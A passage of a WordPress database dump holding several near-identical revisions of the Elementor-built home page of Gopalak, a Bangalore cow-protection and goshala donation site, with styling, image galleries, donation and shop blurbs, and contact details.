- 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:27:41','2022-10-19 05:57:41','',1373,'https://gopalak.in/?p=1840',0,'revision','',0),(1841,1,'2022-10-19 11:27:41','2022-10-19 05:57:41','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:27:41','2022-10-19 05:57:41','',1373,'https://gopalak.in/?p=1841',0,'revision','',0),(1842,1,'2022-10-19 11:28:13','2022-10-19 05:58:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:13','2022-10-19 05:58:13','',1373,'https://gopalak.in/?p=1842',0,'revision','',0),(1843,1,'2022-10-19 11:28:13','2022-10-19 05:58:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:13','2022-10-19 05:58:13','',1373,'https://gopalak.in/?p=1843',0,'revision','',0),(1844,1,'2022-10-19 11:28:13','2022-10-19 05:58:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img 